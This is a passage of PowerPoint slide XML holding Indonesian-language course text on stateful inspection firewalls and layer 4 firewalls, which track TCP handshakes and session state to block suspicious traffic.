              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inspeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> stateful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua host. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> stateful inspection. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diijinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengijinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lewat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diawasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>Pemeriksaan keadaan dapat terjadi pada lapisan 4 dan lapisan 7.</a:t>
            </a:r>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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303681718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Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 4 Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OSI. Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jabat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TCP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SYN &gt; SYN/ACK &gt; ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyimpangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anomali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banjir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembajakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menanggapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Firewall juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
